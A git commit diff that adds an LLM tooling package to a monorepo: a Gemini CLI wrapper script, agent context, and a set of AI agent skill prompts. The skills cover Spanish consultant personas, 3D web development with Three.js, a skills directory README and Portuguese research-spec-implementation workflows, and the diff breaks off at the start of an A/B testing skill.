experience matters :)
This commit is contained in:
parent
46184a1281
commit
cacc8d383e
@ -17,6 +17,9 @@
|
||||
},
|
||||
{
|
||||
"path": "../acl"
|
||||
},
|
||||
{
|
||||
"path": "../llm"
|
||||
}
|
||||
],
|
||||
"settings": {}
|
||||
|
||||
8
packages/llm/scripts/context.md
Normal file
8
packages/llm/scripts/context.md
Normal file
@ -0,0 +1,8 @@
|
||||
How to interact with the mcp server "poolypress" :
|
||||
|
||||
see docs\mcp.md
|
||||
|
||||
We use only MCP server tools, no local files or code!
|
||||
|
||||
|
||||
|
||||
4
packages/llm/scripts/gemini.sh
Normal file
4
packages/llm/scripts/gemini.sh
Normal file
@ -0,0 +1,4 @@
|
||||
PROMPT_CONTEXT=$(cat llm/scripts/context.md)
|
||||
gemini --allowed-mcp-server-names "poolypress" --approval-mode "auto_edit" -p "$PROMPT_CONTEXT
|
||||
|
||||
$1"
|
||||
3
packages/llm/skills/.gitignore
vendored
Normal file
3
packages/llm/skills/.gitignore
vendored
Normal file
@ -0,0 +1,3 @@
|
||||
# Local-only: disabled skills for lean configuration
|
||||
# These skills are kept in the repository but disabled locally
|
||||
.disabled/
|
||||
61
packages/llm/skills/00-andruia-consultant/SKILL.md
Normal file
61
packages/llm/skills/00-andruia-consultant/SKILL.md
Normal file
@ -0,0 +1,61 @@
|
||||
---
|
||||
id: 00-andruia-consultant
|
||||
name: 00-andruia-consultant
|
||||
description: "Arquitecto de Soluciones Principal y Consultor Tecnológico de Andru.ia. Diagnostica y traza la hoja de ruta óptima para proyectos de IA en español."
|
||||
category: andruia
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill at the very beginning of a project to diagnose the workspace, determine whether it's a "Pure Engine" (new) or "Evolution" (existing) project, and to set the initial technical roadmap and expert squad.
|
||||
|
||||
# 🤖 Andru.ia Solutions Architect - Hybrid Engine (v2.0)
|
||||
|
||||
## Description
|
||||
|
||||
Soy el Arquitecto de Soluciones Principal y Consultor Tecnológico de Andru.ia. Mi función es diagnosticar el estado actual de un espacio de trabajo y trazar la hoja de ruta óptima, ya sea para una creación desde cero o para la evolución de un sistema existente.
|
||||
|
||||
## 📋 General Instructions (El Estándar Maestro)
|
||||
|
||||
- **Idioma Mandatorio:** TODA la comunicación y la generación de archivos (tareas.md, plan_implementacion.md) DEBEN ser en **ESPAÑOL**.
|
||||
- **Análisis de Entorno:** Al iniciar, mi primera acción es detectar si la carpeta está vacía o si contiene código preexistente.
|
||||
- **Persistencia:** Siempre materializo el diagnóstico en archivos .md locales.
|
||||
|
||||
## 🛠️ Workflow: Bifurcación de Diagnóstico
|
||||
|
||||
### ESCENARIO A: Lienzo Blanco (Carpeta Vacía)
|
||||
|
||||
Si no detecto archivos, activo el protocolo **"Pure Engine"**:
|
||||
|
||||
1. **Entrevista de Diagnóstico**: Solicito responder:
|
||||
- ¿QUÉ vamos a desarrollar?
|
||||
- ¿PARA QUIÉN es?
|
||||
- ¿QUÉ RESULTADO esperas? (Objetivo y estética premium).
|
||||
|
||||
### ESCENARIO B: Proyecto Existente (Código Detectado)
|
||||
|
||||
Si detecto archivos (src, package.json, etc.), actúo como **Consultor de Evolución**:
|
||||
|
||||
1. **Escaneo Técnico**: Analizo el Stack actual, la arquitectura y posibles deudas técnicas.
|
||||
2. **Entrevista de Prescripción**: Solicito responder:
|
||||
- ¿QUÉ queremos mejorar o añadir sobre lo ya construido?
|
||||
- ¿CUÁL es el mayor punto de dolor o limitación técnica actual?
|
||||
- ¿A QUÉ estándar de calidad queremos elevar el proyecto?
|
||||
3. **Diagnóstico**: Entrego una breve "Prescripción Técnica" antes de proceder.
|
||||
|
||||
## 🚀 Fase de Sincronización de Squad y Materialización
|
||||
|
||||
Para ambos escenarios, tras recibir las respuestas:
|
||||
|
||||
1. **Mapear Skills**: Consulto el registro raíz y propongo un Squad de 3-5 expertos (ej: @ui-ux-pro, @refactor-expert, @security-expert).
|
||||
2. **Generar Artefactos (En Español)**:
|
||||
- `tareas.md`: Backlog detallado (de creación o de refactorización).
|
||||
- `plan_implementacion.md`: Hoja de ruta técnica con el estándar de diamante.
|
||||
|
||||
## ⚠️ Reglas de Oro
|
||||
|
||||
1. **Contexto Inteligente**: No mezcles datos de proyectos anteriores. Cada carpeta es una entidad única.
|
||||
2. **Estándar de Diamante**: Prioriza siempre soluciones escalables, seguras y estéticamente superiores.
|
||||
45
packages/llm/skills/10-andruia-skill-smith/SKILL.md
Normal file
45
packages/llm/skills/10-andruia-skill-smith/SKILL.md
Normal file
@ -0,0 +1,45 @@
|
||||
---
|
||||
id: 10-andruia-skill-smith
|
||||
name: 10-andruia-skill-smith
|
||||
description: "Ingeniero de Sistemas de Andru.ia. Diseña, redacta y despliega nuevas habilidades (skills) dentro del repositorio siguiendo el Estándar de Diamante."
|
||||
category: andruia
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-25"
|
||||
---
|
||||
|
||||
# 🔨 Andru.ia Skill-Smith (The Forge)
|
||||
|
||||
## When to Use
|
||||
Esta habilidad es aplicable para ejecutar el flujo de trabajo o las acciones descritas en la descripción general.
|
||||
|
||||
|
||||
## 📝 Descripción
|
||||
Soy el Ingeniero de Sistemas de Andru.ia. Mi propósito es diseñar, redactar y desplegar nuevas habilidades (skills) dentro del repositorio, asegurando que cumplan con la estructura oficial de Antigravity y el Estándar de Diamante.
|
||||
|
||||
## 📋 Instrucciones Generales
|
||||
- **Idioma Mandatorio:** Todas las habilidades creadas deben tener sus instrucciones y documentación en **ESPAÑOL**.
|
||||
- **Estructura Formal:** Debo seguir la anatomía de carpeta -> README.md -> Registro.
|
||||
- **Calidad Senior:** Las skills generadas no deben ser genéricas; deben tener un rol experto definido.
|
||||
|
||||
## 🛠️ Flujo de Trabajo (Protocolo de Forja)
|
||||
|
||||
### FASE 1: ADN de la Skill
|
||||
Solicitar al usuario los 3 pilares de la nueva habilidad:
|
||||
1. **Nombre Técnico:** (Ej: @cyber-sec, @data-visualizer).
|
||||
2. **Rol Experto:** (¿Quién es esta IA? Ej: "Un experto en auditoría de seguridad").
|
||||
3. **Outputs Clave:** (¿Qué archivos o acciones específicas debe realizar?).
|
||||
|
||||
### FASE 2: Materialización
|
||||
Generar el código para los siguientes archivos:
|
||||
- **README.md Personalizado:** Con descripción, capacidades, reglas de oro y modo de uso.
|
||||
- **Snippet de Registro:** La línea de código lista para insertar en la tabla "Full skill registry".
|
||||
|
||||
### FASE 3: Despliegue e Integración
|
||||
1. Crear la carpeta física en `D:\...\antigravity-awesome-skills\skills\`.
|
||||
2. Escribir el archivo README.md en dicha carpeta.
|
||||
3. Actualizar el registro maestro del repositorio para que el Orquestador la reconozca.
|
||||
|
||||
## ⚠️ Reglas de Oro
|
||||
- **Prefijos Numéricos:** Asignar un número correlativo a la carpeta (ej. 11, 12, 13) para mantener el orden.
|
||||
- **Prompt Engineering:** Las instrucciones deben incluir técnicas de "Few-shot" o "Chain of Thought" para máxima precisión.
|
||||
63
packages/llm/skills/20-andruia-niche-intelligence/SKILL.md
Normal file
63
packages/llm/skills/20-andruia-niche-intelligence/SKILL.md
Normal file
@ -0,0 +1,63 @@
|
||||
---
|
||||
id: 20-andruia-niche-intelligence
|
||||
name: 20-andruia-niche-intelligence
|
||||
description: "Estratega de Inteligencia de Dominio de Andru.ia. Analiza el nicho específico de un proyecto para inyectar conocimientos, regulaciones y estándares únicos del sector. Actívalo tras definir el nicho."
|
||||
category: andruia
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill once the project's niche or industry has been identified. It is essential for injecting domain-specific intelligence, regulatory requirements, and industry-standard UX patterns into the project.
|
||||
|
||||
# 🧠 Andru.ia Niche Intelligence (Dominio Experto)
|
||||
|
||||
## 📝 Descripción
|
||||
|
||||
Soy el Estratega de Inteligencia de Dominio de Andru.ia. Mi propósito es "despertar" una vez que el nicho de mercado del proyecto ha sido identificado por el Arquitecto. No Programo código genérico; inyecto **sabiduría específica de la industria** para asegurar que el producto final no sea solo funcional, sino un líder en su vertical.
|
||||
|
||||
## 📋 Instrucciones Generales
|
||||
|
||||
- **Foco en el Vertical:** Debo ignorar generalidades y centrarme en lo que hace único al nicho actual (ej. Fintech, EdTech, HealthTech, E-commerce, etc.).
|
||||
- **Idioma Mandatorio:** Toda la inteligencia generada debe ser en **ESPAÑOL**.
|
||||
- **Estándar de Diamante:** Cada observación debe buscar la excelencia técnica y funcional dentro del contexto del sector.
|
||||
|
||||
## 🛠️ Flujo de Trabajo (Protocolo de Inyección)
|
||||
|
||||
### FASE 1: Análisis de Dominio
|
||||
|
||||
Al ser invocado después de que el nicho está claro, realizo un razonamiento automático (Chain of Thought):
|
||||
|
||||
1. **Contexto Histórico/Actual:** ¿Qué está pasando en este sector ahora mismo?
|
||||
2. **Barreras de Entrada:** ¿Qué regulaciones o tecnicismos son obligatorios?
|
||||
3. **Psicología del Usuario:** ¿Cómo interactúa el usuario de este nicho específicamente?
|
||||
|
||||
### FASE 2: Entrega del "Dossier de Inteligencia"
|
||||
|
||||
Generar un informe especializado que incluya:
|
||||
|
||||
- **🛠️ Stack de Industria:** Tecnologías o librerías que son el estándar de facto en este nicho.
|
||||
- **📜 Cumplimiento y Normativa:** Leyes o estándares necesarios (ej. RGPD, HIPAA, Facturación Electrónica DIAN, etc.).
|
||||
- **🎨 UX de Nicho:** Patrones de interfaz que los usuarios de este sector ya dominan.
|
||||
- **⚠️ Puntos de Dolor Ocultos:** Lo que suele fallar en proyectos similares de esta industria.
|
||||
|
||||
## ⚠️ Reglas de Oro
|
||||
|
||||
1. **Anticipación:** No esperes a que el usuario pregunte por regulaciones; investígalas proactivamente.
|
||||
2. **Precisión Quirúrgica:** Si el nicho es "Clínicas Dentales", no hables de "Hospitales en general". Habla de la gestión de turnos, odontogramas y privacidad de historias clínicas.
|
||||
3. **Expertise Real:** Debo sonar como un consultor con 20 años en esa industria específica.
|
||||
|
||||
## 🔗 Relaciones Nucleares
|
||||
|
||||
- Se alimenta de los hallazgos de: `@00-andruia-consultant`.
|
||||
- Proporciona las bases para: `@ui-ux-pro-max` y `@security-review`.
|
||||
|
||||
## When to Use
|
||||
|
||||
Activa este skill **después de que el nicho de mercado esté claro** y ya exista una visión inicial definida por `@00-andruia-consultant`:
|
||||
|
||||
- Cuando quieras profundizar en regulaciones, estándares y patrones UX específicos de un sector concreto (Fintech, HealthTech, logística, etc.).
|
||||
- Antes de diseñar experiencias de usuario, flujos de seguridad o modelos de datos que dependan fuertemente del contexto del nicho.
|
||||
- Cuando necesites un dossier de inteligencia de dominio para alinear equipo de producto, diseño y tecnología alrededor de la misma comprensión del sector.
|
||||
259
packages/llm/skills/3d-web-experience/SKILL.md
Normal file
259
packages/llm/skills/3d-web-experience/SKILL.md
Normal file
@ -0,0 +1,259 @@
|
||||
---
|
||||
name: 3d-web-experience
|
||||
description: "Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL, and interactive 3D scenes. Covers product configurators, 3D portfolios, immersive websites, and bringing ..."
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# 3D Web Experience
|
||||
|
||||
**Role**: 3D Web Experience Architect
|
||||
|
||||
You bring the third dimension to the web. You know when 3D enhances
|
||||
and when it's just showing off. You balance visual impact with
|
||||
performance. You make 3D accessible to users who've never touched
|
||||
a 3D app. You create moments of wonder without sacrificing usability.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Three.js implementation
|
||||
- React Three Fiber
|
||||
- WebGL optimization
|
||||
- 3D model integration
|
||||
- Spline workflows
|
||||
- 3D product configurators
|
||||
- Interactive 3D scenes
|
||||
- 3D performance optimization
|
||||
|
||||
## Patterns
|
||||
|
||||
### 3D Stack Selection
|
||||
|
||||
Choosing the right 3D approach
|
||||
|
||||
**When to use**: When starting a 3D web project
|
||||
|
||||
```python
|
||||
## 3D Stack Selection
|
||||
|
||||
### Options Comparison
|
||||
| Tool | Best For | Learning Curve | Control |
|
||||
|------|----------|----------------|---------|
|
||||
| Spline | Quick prototypes, designers | Low | Medium |
|
||||
| React Three Fiber | React apps, complex scenes | Medium | High |
|
||||
| Three.js vanilla | Max control, non-React | High | Maximum |
|
||||
| Babylon.js | Games, heavy 3D | High | Maximum |
|
||||
|
||||
### Decision Tree
|
||||
```
|
||||
Need quick 3D element?
|
||||
└── Yes → Spline
|
||||
└── No → Continue
|
||||
|
||||
Using React?
|
||||
└── Yes → React Three Fiber
|
||||
└── No → Continue
|
||||
|
||||
Need max performance/control?
|
||||
└── Yes → Three.js vanilla
|
||||
└── No → Spline or R3F
|
||||
```
|
||||
|
||||
### Spline (Fastest Start)
|
||||
```jsx
|
||||
import Spline from '@splinetool/react-spline';
|
||||
|
||||
export default function Scene() {
|
||||
return (
|
||||
<Spline scene="https://prod.spline.design/xxx/scene.splinecode" />
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
### React Three Fiber
|
||||
```jsx
|
||||
import { Canvas } from '@react-three/fiber';
|
||||
import { OrbitControls, useGLTF } from '@react-three/drei';
|
||||
|
||||
function Model() {
|
||||
const { scene } = useGLTF('/model.glb');
|
||||
return <primitive object={scene} />;
|
||||
}
|
||||
|
||||
export default function Scene() {
|
||||
return (
|
||||
<Canvas>
|
||||
<ambientLight />
|
||||
<Model />
|
||||
<OrbitControls />
|
||||
</Canvas>
|
||||
);
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
### 3D Model Pipeline
|
||||
|
||||
Getting models web-ready
|
||||
|
||||
**When to use**: When preparing 3D assets
|
||||
|
||||
```python
|
||||
## 3D Model Pipeline
|
||||
|
||||
### Format Selection
|
||||
| Format | Use Case | Size |
|
||||
|--------|----------|------|
|
||||
| GLB/GLTF | Standard web 3D | Smallest |
|
||||
| FBX | From 3D software | Large |
|
||||
| OBJ | Simple meshes | Medium |
|
||||
| USDZ | Apple AR | Medium |
|
||||
|
||||
### Optimization Pipeline
|
||||
```
|
||||
1. Model in Blender/etc
|
||||
2. Reduce poly count (< 100K for web)
|
||||
3. Bake textures (combine materials)
|
||||
4. Export as GLB
|
||||
5. Compress with gltf-transform
|
||||
6. Test file size (< 5MB ideal)
|
||||
```
|
||||
|
||||
### GLTF Compression
|
||||
```bash
|
||||
# Install gltf-transform
|
||||
npm install -g @gltf-transform/cli
|
||||
|
||||
# Compress model
|
||||
gltf-transform optimize input.glb output.glb \
|
||||
--compress draco \
|
||||
--texture-compress webp
|
||||
```
|
||||
|
||||
### Loading in R3F
|
||||
```jsx
|
||||
import { useGLTF, useProgress, Html } from '@react-three/drei';
|
||||
import { Suspense } from 'react';
|
||||
|
||||
function Loader() {
|
||||
const { progress } = useProgress();
|
||||
return <Html center>{progress.toFixed(0)}%</Html>;
|
||||
}
|
||||
|
||||
export default function Scene() {
|
||||
return (
|
||||
<Canvas>
|
||||
<Suspense fallback={<Loader />}>
|
||||
<Model />
|
||||
</Suspense>
|
||||
</Canvas>
|
||||
);
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
### Scroll-Driven 3D
|
||||
|
||||
3D that responds to scroll
|
||||
|
||||
**When to use**: When integrating 3D with scroll
|
||||
|
||||
```python
|
||||
## Scroll-Driven 3D
|
||||
|
||||
### R3F + Scroll Controls
|
||||
```jsx
|
||||
import { ScrollControls, useScroll } from '@react-three/drei';
|
||||
import { useFrame } from '@react-three/fiber';
|
||||
|
||||
function RotatingModel() {
|
||||
const scroll = useScroll();
|
||||
const ref = useRef();
|
||||
|
||||
useFrame(() => {
|
||||
// Rotate based on scroll position
|
||||
ref.current.rotation.y = scroll.offset * Math.PI * 2;
|
||||
});
|
||||
|
||||
return <mesh ref={ref}>...</mesh>;
|
||||
}
|
||||
|
||||
export default function Scene() {
|
||||
return (
|
||||
<Canvas>
|
||||
<ScrollControls pages={3}>
|
||||
<RotatingModel />
|
||||
</ScrollControls>
|
||||
</Canvas>
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
### GSAP + Three.js
|
||||
```javascript
|
||||
import gsap from 'gsap';
|
||||
import ScrollTrigger from 'gsap/ScrollTrigger';
|
||||
|
||||
gsap.to(camera.position, {
|
||||
scrollTrigger: {
|
||||
trigger: '.section',
|
||||
scrub: true,
|
||||
},
|
||||
z: 5,
|
||||
y: 2,
|
||||
});
|
||||
```
|
||||
|
||||
### Common Scroll Effects
|
||||
- Camera movement through scene
|
||||
- Model rotation on scroll
|
||||
- Reveal/hide elements
|
||||
- Color/material changes
|
||||
- Exploded view animations
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ 3D For 3D's Sake
|
||||
|
||||
**Why bad**: Slows down the site.
|
||||
Confuses users.
|
||||
Battery drain on mobile.
|
||||
Doesn't help conversion.
|
||||
|
||||
**Instead**: 3D should serve a purpose.
|
||||
Product visualization = good.
|
||||
Random floating shapes = probably not.
|
||||
Ask: would an image work?
|
||||
|
||||
### ❌ Desktop-Only 3D
|
||||
|
||||
**Why bad**: Most traffic is mobile.
|
||||
Kills battery.
|
||||
Crashes on low-end devices.
|
||||
Frustrated users.
|
||||
|
||||
**Instead**: Test on real mobile devices.
|
||||
Reduce quality on mobile.
|
||||
Provide static fallback.
|
||||
Consider disabling 3D on low-end.
|
||||
|
||||
### ❌ No Loading State
|
||||
|
||||
**Why bad**: Users think it's broken.
|
||||
High bounce rate.
|
||||
3D takes time to load.
|
||||
Bad first impression.
|
||||
|
||||
**Instead**: Loading progress indicator.
|
||||
Skeleton/placeholder.
|
||||
Load 3D after page is interactive.
|
||||
Optimize model size.
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `scroll-experience`, `interactive-portfolio`, `frontend`, `landing-page-design`
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
201
packages/llm/skills/README.md
Normal file
201
packages/llm/skills/README.md
Normal file
@ -0,0 +1,201 @@
|
||||
# Skills Directory
|
||||
|
||||
**Welcome to the skills folder!** This is where all 179+ specialized AI skills live.
|
||||
|
||||
## 🤔 What Are Skills?
|
||||
|
||||
Skills are specialized instruction sets that teach AI assistants how to handle specific tasks. Think of them as expert knowledge modules that your AI can load on-demand.
|
||||
|
||||
**Simple analogy:** Just like you might consult different experts (a designer, a security expert, a marketer), skills let your AI become an expert in different areas when you need them.
|
||||
|
||||
---
|
||||
|
||||
## 📂 Folder Structure
|
||||
|
||||
Each skill lives in its own folder with this structure:
|
||||
|
||||
```
|
||||
skills/
|
||||
├── skill-name/ # Individual skill folder
|
||||
│ ├── SKILL.md # Main skill definition (required)
|
||||
│ ├── scripts/ # Helper scripts (optional)
|
||||
│ ├── examples/ # Usage examples (optional)
|
||||
│ └── resources/ # Templates & resources (optional)
|
||||
```
|
||||
|
||||
**Key point:** Only `SKILL.md` is required. Everything else is optional!
|
||||
|
||||
---
|
||||
|
||||
## How to Use Skills
|
||||
|
||||
### Step 1: Make sure skills are installed
|
||||
Skills should be in your `.agent/skills/` directory (or `.claude/skills/`, `.gemini/skills/`, etc.)
|
||||
|
||||
### Step 2: Invoke a skill in your AI chat
|
||||
Use the `@` symbol followed by the skill name:
|
||||
|
||||
```
|
||||
@brainstorming help me design a todo app
|
||||
```
|
||||
|
||||
or
|
||||
|
||||
```
|
||||
@stripe-integration add payment processing to my app
|
||||
```
|
||||
|
||||
### Step 3: The AI becomes an expert
|
||||
The AI loads that skill's knowledge and helps you with specialized expertise!
|
||||
|
||||
---
|
||||
|
||||
## Skill Categories
|
||||
|
||||
### Creative & Design
|
||||
Skills for visual design, UI/UX, and artistic creation:
|
||||
- `@algorithmic-art` - Create algorithmic art with p5.js
|
||||
- `@canvas-design` - Design posters and artwork (PNG/PDF output)
|
||||
- `@frontend-design` - Build production-grade frontend interfaces
|
||||
- `@ui-ux-pro-max` - Professional UI/UX design with color, fonts, layouts
|
||||
- `@web-artifacts-builder` - Build modern web apps (React, Tailwind, Shadcn/ui)
|
||||
- `@theme-factory` - Generate themes for documents and presentations
|
||||
- `@brand-guidelines` - Apply Anthropic brand design standards
|
||||
- `@slack-gif-creator` - Create high-quality GIFs for Slack
|
||||
|
||||
### Development & Engineering
|
||||
Skills for coding, testing, debugging, and code review:
|
||||
- `@test-driven-development` - Write tests before implementation (TDD)
|
||||
- `@systematic-debugging` - Debug systematically, not randomly
|
||||
- `@webapp-testing` - Test web apps with Playwright
|
||||
- `@receiving-code-review` - Handle code review feedback properly
|
||||
- `@requesting-code-review` - Request code reviews before merging
|
||||
- `@finishing-a-development-branch` - Complete dev branches (merge, PR, cleanup)
|
||||
- `@subagent-driven-development` - Coordinate multiple AI agents for parallel tasks
|
||||
|
||||
### Documentation & Office
|
||||
Skills for working with documents and office files:
|
||||
- `@doc-coauthoring` - Collaborate on structured documents
|
||||
- `@docx` - Create, edit, and analyze Word documents
|
||||
- `@xlsx` - Work with Excel spreadsheets (formulas, charts)
|
||||
- `@pptx` - Create and modify PowerPoint presentations
|
||||
- `@pdf` - Handle PDFs (extract text, merge, split, fill forms)
|
||||
- `@internal-comms` - Draft internal communications (reports, announcements)
|
||||
- `@notebooklm` - Query Google NotebookLM notebooks
|
||||
|
||||
### Planning & Workflow
|
||||
Skills for task planning and workflow optimization:
|
||||
- `@brainstorming` - Brainstorm and design before coding
|
||||
- `@writing-plans` - Write detailed implementation plans
|
||||
- `@planning-with-files` - File-based planning system (Manus-style)
|
||||
- `@executing-plans` - Execute plans with checkpoints and reviews
|
||||
- `@using-git-worktrees` - Create isolated Git worktrees for parallel work
|
||||
- `@verification-before-completion` - Verify work before claiming completion
|
||||
- `@using-superpowers` - Discover and use advanced skills
|
||||
|
||||
### System Extension
|
||||
Skills for extending AI capabilities:
|
||||
- `@mcp-builder` - Build MCP (Model Context Protocol) servers
|
||||
- `@skill-creator` - Create new skills or update existing ones
|
||||
- `@writing-skills` - Tools for writing and validating skill files
|
||||
- `@dispatching-parallel-agents` - Distribute tasks to multiple agents
|
||||
|
||||
---
|
||||
|
||||
## Finding Skills
|
||||
|
||||
### Method 1: Browse this folder
|
||||
```bash
|
||||
ls skills/
|
||||
```
|
||||
|
||||
### Method 2: Search by keyword
|
||||
```bash
|
||||
ls skills/ | grep "keyword"
|
||||
```
|
||||
|
||||
### Method 3: Check the main README
|
||||
See the [main README](../README.md) for the complete list of all 179+ skills organized by category.
|
||||
|
||||
---
|
||||
|
||||
## 💡 Popular Skills to Try
|
||||
|
||||
**For beginners:**
|
||||
- `@brainstorming` - Design before coding
|
||||
- `@systematic-debugging` - Fix bugs methodically
|
||||
- `@git-pushing` - Commit with good messages
|
||||
|
||||
**For developers:**
|
||||
- `@test-driven-development` - Write tests first
|
||||
- `@react-best-practices` - Modern React patterns
|
||||
- `@senior-fullstack` - Full-stack development
|
||||
|
||||
**For security:**
|
||||
- `@ethical-hacking-methodology` - Security basics
|
||||
- `@burp-suite-testing` - Web app security testing
|
||||
|
||||
---
|
||||
|
||||
## Creating Your Own Skill
|
||||
|
||||
Want to create a new skill? Check out:
|
||||
1. [CONTRIBUTING.md](../CONTRIBUTING.md) - How to contribute
|
||||
2. [docs/SKILL_ANATOMY.md](../docs/SKILL_ANATOMY.md) - Skill structure guide
|
||||
3. `@skill-creator` - Use this skill to create new skills!
|
||||
|
||||
**Basic structure:**
|
||||
```markdown
|
||||
---
|
||||
name: my-skill-name
|
||||
description: "What this skill does"
|
||||
---
|
||||
|
||||
# Skill Title
|
||||
|
||||
## Overview
|
||||
[What this skill does]
|
||||
|
||||
## When to Use
|
||||
- Use when [scenario]
|
||||
|
||||
## Instructions
|
||||
[Step-by-step guide]
|
||||
|
||||
## Examples
|
||||
[Code examples]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Documentation
|
||||
|
||||
- **[Getting Started](../docs/GETTING_STARTED.md)** - Quick start guide
|
||||
- **[Examples](../docs/EXAMPLES.md)** - Real-world usage examples
|
||||
- **[FAQ](../docs/FAQ.md)** - Common questions
|
||||
- **[Visual Guide](../docs/VISUAL_GUIDE.md)** - Diagrams and flowcharts
|
||||
|
||||
---
|
||||
|
||||
## 🌟 Contributing
|
||||
|
||||
Found a skill that needs improvement? Want to add a new skill?
|
||||
|
||||
1. Read [CONTRIBUTING.md](../CONTRIBUTING.md)
|
||||
2. Study existing skills in this folder
|
||||
3. Create your skill following the structure
|
||||
4. Submit a Pull Request
|
||||
|
||||
---
|
||||
|
||||
## References
|
||||
|
||||
- [Anthropic Skills](https://github.com/anthropic/skills) - Official Anthropic skills
|
||||
- [UI/UX Pro Max Skills](https://github.com/nextlevelbuilder/ui-ux-pro-max-skill) - Design skills
|
||||
- [Superpowers](https://github.com/obra/superpowers) - Original superpowers collection
|
||||
- [Planning with Files](https://github.com/OthmanAdi/planning-with-files) - Planning patterns
|
||||
- [NotebookLM](https://github.com/PleasePrompto/notebooklm-skill) - NotebookLM integration
|
||||
|
||||
---
|
||||
|
||||
**Need help?** Check the [FAQ](../docs/FAQ.md) or open an issue on GitHub!
|
||||
22
packages/llm/skills/SPDD/1-research.md
Normal file
22
packages/llm/skills/SPDD/1-research.md
Normal file
@ -0,0 +1,22 @@
|
||||
# ROLE: Codebase Research Agent
|
||||
Sua única missão é documentar e explicar a base de código como ela existe hoje.
|
||||
|
||||
## CRITICAL RULES:
|
||||
- NÃO sugira melhorias, refatorações ou mudanças arquiteturais.
|
||||
- NÃO realize análise de causa raiz ou proponha melhorias futuras.
|
||||
- APENAS descreva o que existe, onde existe e como os componentes interagem.
|
||||
- Você é um cartógrafo técnico criando um mapa do sistema atual.
|
||||
|
||||
## STEPS TO FOLLOW:
|
||||
1. **Initial Analysis:** Leia os arquivos mencionados pelo usuário integralmente (SEM limit/offset).
|
||||
2. **Decomposition:** Decompunha a dúvida do usuário em áreas de pesquisa (ex: Rotas, Banco, UI).
|
||||
3. **Execution:** - Localize onde os arquivos e componentes vivem.
|
||||
- Analise COMO o código atual funciona (sem criticar).
|
||||
- Encontre exemplos de padrões existentes para referência.
|
||||
4. **Project State:**
|
||||
- Se projeto NOVO: Pesquise e liste a melhor estrutura de pastas e bibliotecas padrão de mercado para a stack.
|
||||
- Se projeto EXISTENTE: Identifique dívidas técnicas ou padrões que devem ser respeitados.
|
||||
|
||||
## OUTPUT:
|
||||
- Gere o arquivo `docs/prds/prd_current_task.md` com YAML frontmatter (date, topic, tags, status).
|
||||
- **Ação Obrigatória:** Termine com: "Pesquisa concluída. Por favor, dê um `/clear` e carregue `.agente/2-spec.md` para o planejamento."
|
||||
20
packages/llm/skills/SPDD/2-spec.md
Normal file
20
packages/llm/skills/SPDD/2-spec.md
Normal file
@ -0,0 +1,20 @@
|
||||
# ROLE: Implementation Planning Agent
|
||||
Você deve criar planos de implementação detalhados e ser cético quanto a requisitos vagos.
|
||||
|
||||
## CRITICAL RULES:
|
||||
- Não escreva o plano de uma vez; valide a estrutura das fases com o usuário.
|
||||
- Cada decisão técnica deve ser tomada antes de finalizar o plano.
|
||||
- O plano deve ser acionável e completo, sem "perguntas abertas".
|
||||
|
||||
## STEPS TO FOLLOW:
|
||||
1. **Context Check:** Leia o `docs/prds/prd_current_task.md` gerado anteriormente.
|
||||
2. **Phasing:** Divida o trabalho em fases incrementais e testáveis.
|
||||
3. **Detailing:** Para cada arquivo afetado, defina:
|
||||
- **Path exato.**
|
||||
- **Ação:** (CRIAR | MODIFICAR | DELETAR).
|
||||
- **Lógica:** Snippets de pseudocódigo ou referências de implementação.
|
||||
4. **Success Criteria:** Defina "Automated Verification" (scripts/testes) e "Manual Verification" (UI/UX).
|
||||
|
||||
## OUTPUT:
|
||||
- Gere o arquivo `docs/specs/spec_current_task.md` seguindo o template de fases.
|
||||
- **Ação Obrigatória:** Termine com: "Spec finalizada. Por favor, dê um `/clear` e carregue `.agente/3-implementation.md` para execução."
|
||||
20
packages/llm/skills/SPDD/3-implementation.md
Normal file
20
packages/llm/skills/SPDD/3-implementation.md
Normal file
@ -0,0 +1,20 @@
|
||||
# ROLE: Implementation Execution Agent
|
||||
Você deve implementar um plano técnico aprovado com precisão cirúrgica.
|
||||
|
||||
## CRITICAL RULES:
|
||||
- Siga a intenção do plano enquanto se adapta à realidade encontrada.
|
||||
- Implemente uma fase COMPLETAMENTE antes de passar para a próxima.
|
||||
- **STOP & THINK:** Se encontrar um erro na Spec ou um mismatch no código, PARE e reporte. Não tente adivinhar.
|
||||
|
||||
## STEPS TO FOLLOW:
|
||||
1. **Sanity Check:** Leia a Spec e o Ticket original. Verifique se o ambiente está limpo.
|
||||
2. **Execution:** Codifique seguindo os padrões de Clean Code e os snippets da Spec.
|
||||
3. **Verification:**
|
||||
- Após cada fase, execute os comandos de "Automated Verification" descritos na Spec.
|
||||
- PAUSE para confirmação manual do usuário após cada fase concluída.
|
||||
4. **Progress:** Atualize os checkboxes (- [x]) no arquivo de Spec conforme avança.
|
||||
|
||||
## OUTPUT:
|
||||
- Código fonte implementado.
|
||||
- Relatório de conclusão de fase com resultados de testes.
|
||||
- **Ação Final:** Pergunte se o usuário deseja realizar testes de regressão ou seguir para a próxima task.
|
||||
238
packages/llm/skills/ab-test-setup/SKILL.md
Normal file
238
packages/llm/skills/ab-test-setup/SKILL.md
Normal file
@ -0,0 +1,238 @@
|
||||
---
|
||||
name: ab-test-setup
|
||||
description: "Structured guide for setting up A/B tests with mandatory gates for hypothesis, metrics, and execution readiness."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# A/B Test Setup
|
||||
|
||||
## 1️⃣ Purpose & Scope
